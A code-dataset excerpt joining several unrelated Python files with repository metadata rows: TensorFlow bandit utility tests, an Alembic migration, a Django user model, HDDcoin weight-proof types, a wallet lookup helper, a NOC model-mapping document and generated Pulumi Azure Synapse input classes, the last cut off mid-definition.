'testcase_name': '_batch4_contextdim5',
'batch_size': 4,
'context_dim': 5,
})
class UtilsTest(tf.test.TestCase, parameterized.TestCase):
def testNumActionsFromTensorSpecGoodSpec(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=15)
num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
self.assertEqual(num_actions, 16)
def testNumActionsFromTensorSpecWrongRank(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(2, 3), minimum=0, maximum=15)
with self.assertRaisesRegexp(ValueError, r'Action spec must be a scalar'):
utils.get_num_actions_from_tensor_spec(action_spec)
@test_cases()
def testBUpdate(self, batch_size, context_dim):
b_array = np.array(range(context_dim))
r_array = np.array(range(batch_size)).reshape((batch_size, 1))
x_array = np.array(range(batch_size * context_dim)).reshape(
(batch_size, context_dim))
rx = r_array * x_array
expected_b_updated_array = b_array + np.sum(rx, axis=0)
b = tf.constant(b_array, dtype=tf.float32, shape=[context_dim])
r = tf.constant(r_array, dtype=tf.float32, shape=[batch_size])
x = tf.constant(x_array, dtype=tf.float32, shape=[batch_size, context_dim])
b_update = utils.sum_reward_weighted_observations(r, x)
self.assertAllClose(expected_b_updated_array, self.evaluate(b + b_update))
@test_cases()
def testBUpdateEmptyObservations(self, batch_size, context_dim):
r = tf.constant([], dtype=tf.float32, shape=[0, 1])
x = tf.constant([], dtype=tf.float32, shape=[0, context_dim])
b_update = utils.sum_reward_weighted_observations(r, x)
expected_b_update_array = np.zeros([context_dim], dtype=np.float32)
self.assertAllClose(expected_b_update_array, self.evaluate(b_update))
def testLaplacian1D(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=4)
num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
laplacian_matrix = tf.convert_to_tensor(
utils.build_laplacian_over_ordinal_integer_actions(action_spec),
dtype=tf.float32)
res = tf.matmul(
laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
row_sum = tf.reduce_sum(laplacian_matrix, 1)
self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
column_sum = tf.reduce_sum(laplacian_matrix, 0)
self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
self.assertAllClose(2.0, laplacian_matrix[1, 1])
laplacian_matrix_expected = np.array(
[[1.0, -1.0, 0.0, 0.0, 0.0],
[-1.0, 2.0, -1.0, 0.0, 0.0],
[0.0, -1.0, 2.0, -1.0, 0.0],
[0.0, 0.0, -1.0, 2.0, -1.0],
[0.0, 0.0, 0.0, -1.0, 1.0]])
self.assertAllClose(laplacian_matrix_expected,
self.evaluate(laplacian_matrix))
def testComputePairwiseDistances(self):
input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
pdist_matrix = np.array(
[[0.0, 27.0, 108.0,],
[27.0, 0.0, 27.0],
[108.0, 27.0, 0.0]])
tf_dist_matrix = utils.compute_pairwise_distances(
tf.constant(input_vects, dtype=tf.float32))
self.assertAllClose(pdist_matrix, self.evaluate(tf_dist_matrix))
def testBuildLaplacianNearestNeighborGraph(self):
input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9],
[10, 11, 12], [13, 14, 15]])
num_actions = input_vects.shape[0]
laplacian_matrix = utils.build_laplacian_nearest_neighbor_graph(
tf.constant(input_vects, dtype=tf.float32), k=2)
res = tf.matmul(
laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
row_sum = tf.reduce_sum(laplacian_matrix, 1)
self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
column_sum = tf.reduce_sum(laplacian_matrix, 0)
self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
self.assertAllClose(2.0, laplacian_matrix[0, 0])
self.assertAllClose(4.0, laplacian_matrix[2, 2])
if __name__ == '__main__':
tf.test.main()
| true | true |
f725e6fdee776868b7306032eb1649135fbb2a82 | 1,471 | py | Python | migrations/versions/5bc9e9b6c3ff_unify_local_and_remote_int8.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 23 | 2022-03-17T12:24:09.000Z | 2022-03-31T09:13:30.000Z | migrations/versions/5bc9e9b6c3ff_unify_local_and_remote_int8.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 18 | 2022-03-21T08:17:44.000Z | 2022-03-30T12:42:30.000Z | migrations/versions/5bc9e9b6c3ff_unify_local_and_remote_int8.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 16 | 2022-03-17T12:24:14.000Z | 2022-03-31T12:15:12.000Z | """Unify local and remote int8
Revision ID: 5bc9e9b6c3ff
Revises: 7f3c818591e1
Create Date: 2021-03-29 15:28:58.945918
"""
"""
OpenVINO DL Workbench
Migration: Unify local and remote int8
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5bc9e9b6c3ff'
down_revision = '7f3c818591e1'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('create_int8_calibration_scripts_jobs',
sa.Column('job_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['job_id'], ['jobs.job_id'], ),
sa.PrimaryKeyConstraint('job_id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('create_int8_calibration_scripts_jobs')
# ### end Alembic commands ###
| 28.843137 | 73 | 0.734194 |
from alembic import op
import sqlalchemy as sa
revision = '5bc9e9b6c3ff'
down_revision = '7f3c818591e1'
branch_labels = None
depends_on = None
def upgrade():
sa.PrimaryKeyConstraint('job_id')
)
| true | true |
f725e78ae37c1db3941ba4ddd91efca669d47928 | 1,424 | py | Python | backend/users/models.py | crowdbotics-apps/flightlevel36zero-31803 | 6c81d2e9394440810c1a5561752a452619388c10 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/users/models.py | crowdbotics-apps/flightlevel36zero-31803 | 6c81d2e9394440810c1a5561752a452619388c10 | [
"FTL",
"AML",
"RSA-MD"
] | 38 | 2021-09-11T01:00:31.000Z | 2021-12-05T17:43:03.000Z | backend/users/models.py | crowdbotics-apps/natures-cornucopia-30308 | 847053dad41bda7122bc15710e0e9e2bf89d6882 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
class User(AbstractUser):
# WARNING!
"""
Some officially supported features of Crowdbotics Dashboard depend on the initial
state of this User model (Such as the creation of superusers using the CLI
or password reset in the dashboard). Changing, extending, or modifying this model
may lead to unexpected bugs and or behaviors in the automated flows provided
by Crowdbotics. Change it at your own risk.
This model represents the User instance of the system, login system and
everything that relates with an `User` is represented by this model.
"""
name = models.CharField(
null=True,
blank=True,
max_length=255,
)
email = models.EmailField(
null=True,
blank=True,
max_length=255,
)
first_name = models.CharField(
null=True,
blank=True,
max_length=255,
)
last_name = models.CharField(
null=True,
blank=True,
max_length=255,
)
timestamp_created = models.DateTimeField(
null=True,
blank=True,
auto_now_add=True,
)
last_updated = models.DateTimeField(
null=True,
blank=True,
auto_now=True,
)
| 27.921569 | 85 | 0.665028 | from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
class User(AbstractUser):
name = models.CharField(
null=True,
blank=True,
max_length=255,
)
email = models.EmailField(
null=True,
blank=True,
max_length=255,
)
first_name = models.CharField(
null=True,
blank=True,
max_length=255,
)
last_name = models.CharField(
null=True,
blank=True,
max_length=255,
)
timestamp_created = models.DateTimeField(
null=True,
blank=True,
auto_now_add=True,
)
last_updated = models.DateTimeField(
null=True,
blank=True,
auto_now=True,
)
| true | true |
f725e948ab21699d629dd278dd83cd81a9a7c910 | 3,205 | py | Python | hddcoin/types/weight_proof.py | JakubSido/hddcoin-blockchain | 7b9da03edee3512295c0f142c07c4759512ccbca | [
"Apache-2.0"
] | 37 | 2021-07-08T23:42:01.000Z | 2022-03-26T21:30:10.000Z | hddcoin/types/weight_proof.py | JakubSido/hddcoin-blockchain | 7b9da03edee3512295c0f142c07c4759512ccbca | [
"Apache-2.0"
] | 13 | 2021-07-11T15:12:01.000Z | 2022-03-15T08:36:18.000Z | hddcoin/types/weight_proof.py | JakubSido/hddcoin-blockchain | 7b9da03edee3512295c0f142c07c4759512ccbca | [
"Apache-2.0"
] | 19 | 2021-07-10T14:09:07.000Z | 2022-03-14T11:17:05.000Z | from dataclasses import dataclass
from typing import List, Optional
from hddcoin.types.blockchain_format.proof_of_space import ProofOfSpace
from hddcoin.types.blockchain_format.reward_chain_block import RewardChainBlock
from hddcoin.types.blockchain_format.sized_bytes import bytes32
from hddcoin.types.blockchain_format.vdf import VDFInfo, VDFProof
from hddcoin.types.end_of_slot_bundle import EndOfSubSlotBundle
from hddcoin.types.header_block import HeaderBlock
from hddcoin.util.ints import uint8, uint32, uint64, uint128
from hddcoin.util.streamable import Streamable, streamable
@dataclass(frozen=True)
@streamable
class SubEpochData(Streamable):
reward_chain_hash: bytes32
num_blocks_overflow: uint8
new_sub_slot_iters: Optional[uint64]
new_difficulty: Optional[uint64]
# number of challenge blocks
# Average iters for challenge blocks
# |--A-R----R-------R--------R------R----R----------R-----R--R---| Honest difficulty 1000
# 0.16
# compute total reward chain blocks
# |----------------------------A---------------------------------| Attackers chain 1000
# 0.48
# total number of challenge blocks == total number of reward chain blocks
@dataclass(frozen=True)
@streamable
class SubSlotData(Streamable):
# if infused
proof_of_space: Optional[ProofOfSpace]
# VDF to signage point
cc_signage_point: Optional[VDFProof]
# VDF from signage to infusion point
cc_infusion_point: Optional[VDFProof]
icc_infusion_point: Optional[VDFProof]
cc_sp_vdf_info: Optional[VDFInfo]
signage_point_index: Optional[uint8]
# VDF from beginning to end of slot if not infused
# from ip to end if infused
cc_slot_end: Optional[VDFProof]
icc_slot_end: Optional[VDFProof]
# info from finished slots
cc_slot_end_info: Optional[VDFInfo]
icc_slot_end_info: Optional[VDFInfo]
cc_ip_vdf_info: Optional[VDFInfo]
icc_ip_vdf_info: Optional[VDFInfo]
total_iters: Optional[uint128]
def is_challenge(self) -> bool:
if self.proof_of_space is not None:
return True
return False
def is_end_of_slot(self) -> bool:
if self.cc_slot_end_info is not None:
return True
return False
@dataclass(frozen=True)
@streamable
class SubEpochChallengeSegment(Streamable):
sub_epoch_n: uint32
sub_slots: List[SubSlotData]
rc_slot_end_info: Optional[VDFInfo] # in first segment of each sub_epoch
@dataclass(frozen=True)
@streamable
# this is used only for serialization to database
class SubEpochSegments(Streamable):
challenge_segments: List[SubEpochChallengeSegment]
@dataclass(frozen=True)
@streamable
# this is used only for serialization to database
class RecentChainData(Streamable):
recent_chain_data: List[HeaderBlock]
@dataclass(frozen=True)
@streamable
class ProofBlockHeader(Streamable):
finished_sub_slots: List[EndOfSubSlotBundle]
reward_chain_block: RewardChainBlock
@dataclass(frozen=True)
@streamable
class WeightProof(Streamable):
sub_epochs: List[SubEpochData]
sub_epoch_segments: List[SubEpochChallengeSegment] # sampled sub epoch
recent_chain_data: List[HeaderBlock]
| 31.116505 | 95 | 0.737285 | from dataclasses import dataclass
from typing import List, Optional
from hddcoin.types.blockchain_format.proof_of_space import ProofOfSpace
from hddcoin.types.blockchain_format.reward_chain_block import RewardChainBlock
from hddcoin.types.blockchain_format.sized_bytes import bytes32
from hddcoin.types.blockchain_format.vdf import VDFInfo, VDFProof
from hddcoin.types.end_of_slot_bundle import EndOfSubSlotBundle
from hddcoin.types.header_block import HeaderBlock
from hddcoin.util.ints import uint8, uint32, uint64, uint128
from hddcoin.util.streamable import Streamable, streamable
@dataclass(frozen=True)
@streamable
class SubEpochData(Streamable):
reward_chain_hash: bytes32
num_blocks_overflow: uint8
new_sub_slot_iters: Optional[uint64]
new_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class SubSlotData(Streamable):
proof_of_space: Optional[ProofOfSpace]
cc_signage_point: Optional[VDFProof]
cc_infusion_point: Optional[VDFProof]
icc_infusion_point: Optional[VDFProof]
cc_sp_vdf_info: Optional[VDFInfo]
signage_point_index: Optional[uint8]
cc_slot_end: Optional[VDFProof]
icc_slot_end: Optional[VDFProof]
cc_slot_end_info: Optional[VDFInfo]
icc_slot_end_info: Optional[VDFInfo]
cc_ip_vdf_info: Optional[VDFInfo]
icc_ip_vdf_info: Optional[VDFInfo]
total_iters: Optional[uint128]
def is_challenge(self) -> bool:
if self.proof_of_space is not None:
return True
return False
def is_end_of_slot(self) -> bool:
if self.cc_slot_end_info is not None:
return True
return False
@dataclass(frozen=True)
@streamable
class SubEpochChallengeSegment(Streamable):
sub_epoch_n: uint32
sub_slots: List[SubSlotData]
rc_slot_end_info: Optional[VDFInfo]
@dataclass(frozen=True)
@streamable
class SubEpochSegments(Streamable):
challenge_segments: List[SubEpochChallengeSegment]
@dataclass(frozen=True)
@streamable
class RecentChainData(Streamable):
recent_chain_data: List[HeaderBlock]
@dataclass(frozen=True)
@streamable
class ProofBlockHeader(Streamable):
finished_sub_slots: List[EndOfSubSlotBundle]
reward_chain_block: RewardChainBlock
@dataclass(frozen=True)
@streamable
class WeightProof(Streamable):
sub_epochs: List[SubEpochData]
sub_epoch_segments: List[SubEpochChallengeSegment]
recent_chain_data: List[HeaderBlock]
| true | true |
f725e98002e1d4f074db4ac84131dc56e48d490e | 395 | py | Python | WalletSystem/walletApp/helpers.py | BakrFrag/Wallet-System | cc4a1114bc0811ef198ae5bc5689cb8696270e91 | [
"MIT"
] | null | null | null | WalletSystem/walletApp/helpers.py | BakrFrag/Wallet-System | cc4a1114bc0811ef198ae5bc5689cb8696270e91 | [
"MIT"
] | null | null | null | WalletSystem/walletApp/helpers.py | BakrFrag/Wallet-System | cc4a1114bc0811ef198ae5bc5689cb8696270e91 | [
"MIT"
] | null | null | null | from .models import Wallet;
from django.core.exceptions import ObjectDoesNotExist
def getWallet(phone_number):
"""
helper function check if wallet with phone number exists or not
"""
try:
walletobj=Wallet.objects.get(phone=phone_number);
return {"exists":True,"wallet":walletobj}
except Wallet.DoesNotExist as E:
return {"exists":False,"wallet":None}; | 35.909091 | 67 | 0.701266 | from .models import Wallet;
from django.core.exceptions import ObjectDoesNotExist
def getWallet(phone_number):
try:
walletobj=Wallet.objects.get(phone=phone_number);
return {"exists":True,"wallet":walletobj}
except Wallet.DoesNotExist as E:
return {"exists":False,"wallet":None}; | true | true |
f725e992c7f42887faa027f5696991c0ea53be19 | 1,092 | py | Python | inv/models/modelmapping.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | inv/models/modelmapping.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | inv/models/modelmapping.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# ModelMapping model
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Third-party modules
from mongoengine.document import Document
from mongoengine.fields import StringField, BooleanField
# NOC modules
from noc.inv.models.objectmodel import ObjectModel
from noc.core.mongo.fields import PlainReferenceField
class ModelMapping(Document):
meta = {"collection": "noc.modelmappings", "strict": False, "auto_create_index": False}
# Vendor, as returned by get_inventory
vendor = StringField()
# Part number, as returned by get_inventory
part_no = StringField()
# Serial number ranges, if applicable
from_serial = StringField()
to_serial = StringField()
#
model = PlainReferenceField(ObjectModel)
#
is_active = BooleanField(default=True)
description = StringField(required=False)
| 33.090909 | 91 | 0.591575 |
from mongoengine.document import Document
from mongoengine.fields import StringField, BooleanField
from noc.inv.models.objectmodel import ObjectModel
from noc.core.mongo.fields import PlainReferenceField
class ModelMapping(Document):
meta = {"collection": "noc.modelmappings", "strict": False, "auto_create_index": False}
vendor = StringField()
part_no = StringField()
from_serial = StringField()
to_serial = StringField()
model = PlainReferenceField(ObjectModel)
is_active = BooleanField(default=True)
description = StringField(required=False)
| true | true |
f725e9ad0a9d9b3dd8993d5832c9cd8a2351f823 | 78,589 | py | Python | sdk/python/pulumi_azure_native/synapse/v20190601preview/_inputs.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20190601preview/_inputs.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/synapse/v20190601preview/_inputs.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AutoPausePropertiesArgs',
'AutoScalePropertiesArgs',
'CmdkeySetupArgs',
'ComponentSetupArgs',
'CustomerManagedKeyDetailsArgs',
'DataLakeStorageAccountDetailsArgs',
'DynamicExecutorAllocationArgs',
'EncryptionDetailsArgs',
'EntityReferenceArgs',
'EnvironmentVariableSetupArgs',
'GitHubClientSecretArgs',
'IntegrationRuntimeComputePropertiesArgs',
'IntegrationRuntimeCustomSetupScriptPropertiesArgs',
'IntegrationRuntimeDataFlowPropertiesArgs',
'IntegrationRuntimeDataProxyPropertiesArgs',
'IntegrationRuntimeSsisCatalogInfoArgs',
'IntegrationRuntimeSsisPropertiesArgs',
'IntegrationRuntimeVNetPropertiesArgs',
'LibraryInfoArgs',
'LibraryRequirementsArgs',
'LinkedIntegrationRuntimeKeyAuthorizationArgs',
'LinkedIntegrationRuntimeRbacAuthorizationArgs',
'ManagedIdentityArgs',
'ManagedIntegrationRuntimeArgs',
'ManagedVirtualNetworkReferenceArgs',
'ManagedVirtualNetworkSettingsArgs',
'PrivateEndpointConnectionArgs',
'PrivateLinkServiceConnectionStateArgs',
'PurviewConfigurationArgs',
'SecureStringArgs',
'SelfHostedIntegrationRuntimeArgs',
'SkuArgs',
'SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs',
'VirtualNetworkProfileArgs',
'VulnerabilityAssessmentRecurringScansPropertiesArgs',
'WorkspaceKeyDetailsArgs',
'WorkspaceRepositoryConfigurationArgs',
]
@pulumi.input_type
class AutoPausePropertiesArgs:
def __init__(__self__, *,
delay_in_minutes: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None):
"""
Auto-pausing properties of a Big Data pool powered by Apache Spark
:param pulumi.Input[int] delay_in_minutes: Number of minutes of idle time before the Big Data pool is automatically paused.
:param pulumi.Input[bool] enabled: Whether auto-pausing is enabled for the Big Data pool.
"""
if delay_in_minutes is not None:
pulumi.set(__self__, "delay_in_minutes", delay_in_minutes)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter(name="delayInMinutes")
def delay_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Number of minutes of idle time before the Big Data pool is automatically paused.
"""
return pulumi.get(self, "delay_in_minutes")
@delay_in_minutes.setter
def delay_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "delay_in_minutes", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether auto-pausing is enabled for the Big Data pool.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class AutoScalePropertiesArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
max_node_count: Optional[pulumi.Input[int]] = None,
min_node_count: Optional[pulumi.Input[int]] = None):
"""
Auto-scaling properties of a Big Data pool powered by Apache Spark
:param pulumi.Input[bool] enabled: Whether automatic scaling is enabled for the Big Data pool.
:param pulumi.Input[int] max_node_count: The maximum number of nodes the Big Data pool can support.
:param pulumi.Input[int] min_node_count: The minimum number of nodes the Big Data pool can support.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if max_node_count is not None:
pulumi.set(__self__, "max_node_count", max_node_count)
if min_node_count is not None:
pulumi.set(__self__, "min_node_count", min_node_count)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether automatic scaling is enabled for the Big Data pool.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="maxNodeCount")
def max_node_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of nodes the Big Data pool can support.
"""
return pulumi.get(self, "max_node_count")
@max_node_count.setter
def max_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_node_count", value)
@property
@pulumi.getter(name="minNodeCount")
def min_node_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of nodes the Big Data pool can support.
"""
return pulumi.get(self, "min_node_count")
@min_node_count.setter
def min_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_node_count", value)
@pulumi.input_type
class CmdkeySetupArgs:
def __init__(__self__, *,
password: pulumi.Input['SecureStringArgs'],
target_name: Any,
type: pulumi.Input[str],
user_name: Any):
"""
The custom setup of running cmdkey commands.
:param pulumi.Input['SecureStringArgs'] password: The password of data source access.
:param Any target_name: The server name of data source access.
:param pulumi.Input[str] type: The type of custom setup.
Expected value is 'CmdkeySetup'.
:param Any user_name: The user name of data source access.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "target_name", target_name)
pulumi.set(__self__, "type", 'CmdkeySetup')
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def password(self) -> pulumi.Input['SecureStringArgs']:
"""
The password of data source access.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input['SecureStringArgs']):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="targetName")
def target_name(self) -> Any:
"""
The server name of data source access.
"""
return pulumi.get(self, "target_name")
@target_name.setter
def target_name(self, value: Any):
pulumi.set(self, "target_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of custom setup.
Expected value is 'CmdkeySetup'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Any:
"""
The user name of data source access.
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Any):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ComponentSetupArgs:
def __init__(__self__, *,
component_name: pulumi.Input[str],
type: pulumi.Input[str],
license_key: Optional[pulumi.Input['SecureStringArgs']] = None):
"""
The custom setup of installing 3rd party components.
:param pulumi.Input[str] component_name: The name of the 3rd party component.
:param pulumi.Input[str] type: The type of custom setup.
Expected value is 'ComponentSetup'.
:param pulumi.Input['SecureStringArgs'] license_key: The license key to activate the component.
"""
pulumi.set(__self__, "component_name", component_name)
pulumi.set(__self__, "type", 'ComponentSetup')
if license_key is not None:
pulumi.set(__self__, "license_key", license_key)
@property
@pulumi.getter(name="componentName")
def component_name(self) -> pulumi.Input[str]:
"""
The name of the 3rd party component.
"""
return pulumi.get(self, "component_name")
@component_name.setter
def component_name(self, value: pulumi.Input[str]):
pulumi.set(self, "component_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of custom setup.
Expected value is 'ComponentSetup'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="licenseKey")
def license_key(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The license key to activate the component.
"""
return pulumi.get(self, "license_key")
@license_key.setter
def license_key(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "license_key", value)
@pulumi.input_type
class CustomerManagedKeyDetailsArgs:
def __init__(__self__, *,
key: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']] = None):
"""
Details of the customer managed key associated with the workspace
:param pulumi.Input['WorkspaceKeyDetailsArgs'] key: The key object of the workspace
"""
if key is not None:
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]:
"""
The key object of the workspace
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]):
pulumi.set(self, "key", value)
@pulumi.input_type
class DataLakeStorageAccountDetailsArgs:
def __init__(__self__, *,
account_url: Optional[pulumi.Input[str]] = None,
filesystem: Optional[pulumi.Input[str]] = None):
"""
Details of the data lake storage account associated with the workspace
:param pulumi.Input[str] account_url: Account URL
:param pulumi.Input[str] filesystem: Filesystem name
"""
if account_url is not None:
pulumi.set(__self__, "account_url", account_url)
if filesystem is not None:
pulumi.set(__self__, "filesystem", filesystem)
@property
@pulumi.getter(name="accountUrl")
def account_url(self) -> Optional[pulumi.Input[str]]:
"""
Account URL
"""
return pulumi.get(self, "account_url")
@account_url.setter
def account_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_url", value)
@property
@pulumi.getter
def filesystem(self) -> Optional[pulumi.Input[str]]:
"""
Filesystem name
"""
return pulumi.get(self, "filesystem")
@filesystem.setter
def filesystem(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filesystem", value)
@pulumi.input_type
class DynamicExecutorAllocationArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None):
"""
Dynamic Executor Allocation Properties
:param pulumi.Input[bool] enabled: Indicates whether Dynamic Executor Allocation is enabled or not.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether Dynamic Executor Allocation is enabled or not.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class EncryptionDetailsArgs:
def __init__(__self__, *,
cmk: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']] = None):
"""
Details of the encryption associated with the workspace
:param pulumi.Input['CustomerManagedKeyDetailsArgs'] cmk: Customer Managed Key Details
"""
if cmk is not None:
pulumi.set(__self__, "cmk", cmk)
@property
@pulumi.getter
def cmk(self) -> Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]:
"""
Customer Managed Key Details
"""
return pulumi.get(self, "cmk")
@cmk.setter
def cmk(self, value: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]):
pulumi.set(self, "cmk", value)
@pulumi.input_type
class EntityReferenceArgs:
def __init__(__self__, *,
reference_name: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]] = None):
"""
The entity reference.
:param pulumi.Input[str] reference_name: The name of this referenced entity.
:param pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']] type: The type of this referenced entity.
"""
if reference_name is not None:
pulumi.set(__self__, "reference_name", reference_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of this referenced entity.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]:
"""
The type of this referenced entity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class EnvironmentVariableSetupArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
variable_name: pulumi.Input[str],
variable_value: pulumi.Input[str]):
"""
The custom setup of setting environment variable.
:param pulumi.Input[str] type: The type of custom setup.
Expected value is 'EnvironmentVariableSetup'.
:param pulumi.Input[str] variable_name: The name of the environment variable.
:param pulumi.Input[str] variable_value: The value of the environment variable.
"""
pulumi.set(__self__, "type", 'EnvironmentVariableSetup')
pulumi.set(__self__, "variable_name", variable_name)
pulumi.set(__self__, "variable_value", variable_value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of custom setup.
Expected value is 'EnvironmentVariableSetup'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="variableName")
def variable_name(self) -> pulumi.Input[str]:
"""
The name of the environment variable.
"""
return pulumi.get(self, "variable_name")
@variable_name.setter
